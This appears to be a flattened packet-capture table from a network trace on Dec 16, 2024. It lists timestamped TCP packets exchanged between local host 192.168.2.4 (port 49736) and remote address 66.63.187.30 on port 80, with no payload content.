                                                                                                                        Dec 16, 2024 16:18:45.596582890 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.596632004 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.604954958 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.605071068 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.605124950 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.605196953 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.718976021 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.718997955 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.719295025 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.721375942 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.721472979 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.721589088 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.721589088 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.725244999 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.725363016 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.725399971 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.725752115 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.730209112 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.730267048 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.730449915 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.735095024 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.735194921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.735224009 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.735291004 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.740181923 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.740206003 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.740271091 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.740271091 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.745089054 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.745096922 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.745181084 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.749413013 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.749484062 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.749525070 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.749542952 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.754273891 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.754333973 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.754389048 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.754389048 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.758980036 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.759114027 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.759134054 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.759243965 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.763736963 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.763808012 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.763858080 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.763956070 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.768553972 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.768659115 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.768690109 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.768719912 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.773252964 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.773360014 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.773369074 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.773503065 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.778075933 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.778162956 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.778315067 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.782845974 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.782942057 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.782953978 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.783082008 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.787739992 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.787866116 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.787930012 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.787987947 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.793047905 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.793231010 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.793263912 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.793375015 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.797138929 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.797235012 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.797244072 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.797341108 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.801922083 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.802061081 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.802100897 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.802191973 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.806746960 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.806852102 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.806891918 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.806948900 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.839303017 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.839318037 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.839500904 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.841494083 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.842634916 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.910767078 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.910851002 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.911081076 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.911082029 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.912759066 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.912888050 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.913506985 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.913633108 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.913722992 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.917510033 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.917617083 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.917628050 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.917727947 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.922146082 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.922287941 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.922312975 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.922463894 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.925489902 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.925530910 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.926625013 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.929187059 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.929267883 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.929415941 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.929415941 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.932898045 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.932990074 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.933024883 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.933165073 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.936578989 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.936587095 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.938632965 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.940026045 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.940105915 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.943339109 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.943552971 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.943592072 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.944211960 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.947076082 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.947192907 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.947339058 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.950777054 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.950947046 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.951339960 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.954161882 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.954286098 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.954761982 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.957699060 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.957793951 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.959017992 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.961536884 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.961605072 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.963339090 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.964721918 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.964767933 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.964932919 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.964932919 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.968245983 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.968343973 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.970449924 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.970458984 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.970653057 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.970653057 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.972518921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.972599983 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.974548101 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.974685907 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.974751949 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.974751949 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.976651907 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.976768017 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.976824999 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.978792906 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.978893042 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.979065895 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.980932951 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.981045961 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.983000994 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.983079910 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.983160019 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.983160019 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.985133886 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.985341072 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.987209082 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.987339973 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.987407923 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.987520933 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.987520933 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.989372969 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.989422083 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.991338968 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.991394997 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.991508961 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.991566896 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.991566896 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.993513107 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.993705034 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.995335102 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.995615005 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.995707989 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.996206999 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:45.997723103 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.997843027 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:45.997905970 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.000085115 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.000129938 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.000205040 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.002418041 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.002494097 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.002949953 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.004126072 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.004302979 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.004595995 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.006108999 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.006191015 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.006206036 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.006249905 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.008384943 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.008475065 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.008496046 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.008527994 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.010364056 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.010452986 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.010551929 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.010598898 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.030817986 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.030877113 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.030917883 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.030999899 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.102763891 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.102845907 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.102859974 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.103024960 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.103389025 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.103446007 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.103497028 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.103497982 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.105484962 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.105581999 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.105609894 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.105670929 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.108108044 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.108212948 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.108256102 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.108256102 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.110043049 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.110160112 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.110192060 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.110450029 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.112684965 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.112739086 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.112837076 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.112911940 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.114425898 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.114511013 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.114557981 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.115950108 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.116013050 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.116034985 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.116415024 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.117371082 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.117429018 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.117461920 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.117489100 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.119157076 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.119241953 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.119281054 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.119281054 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.121030092 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.121059895 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.121403933 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.122739077 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.122800112 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.122901917 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.123059988 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.124545097 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.124638081 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.124689102 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.124774933 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.126169920 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.126348019 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.126530886 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.127861977 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.127959013 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.127990961 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.128081083 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.129503965 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.129621983 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.129733086 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.130431890 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.131135941 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.131333113 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.131390095 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.131736040 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.132736921 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.132932901 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.132966995 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.132982969 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.134416103 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.134505987 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.134552956 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.134552956 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.136281013 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.136353016 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.136393070 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.137815952 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.137893915 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.137984991 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.139106035 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.139153004 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.139245987 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.139297962 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.140631914 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.140806913 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.140815973 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.140878916 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.142198086 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.142306089 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.142398119 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.143795013 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.143965960 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.143969059 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.144207001 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.145361900 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.145451069 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.145497084 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.145497084 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.146939039 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.147061110 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.147092104 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.147092104 CET4973680192.168.2.466.63.187.30
                                                                                                                        Dec 16, 2024 16:18:46.148525000 CET804973666.63.187.30192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:46.148575068 CET4973680192.168.2.466.63.187.30
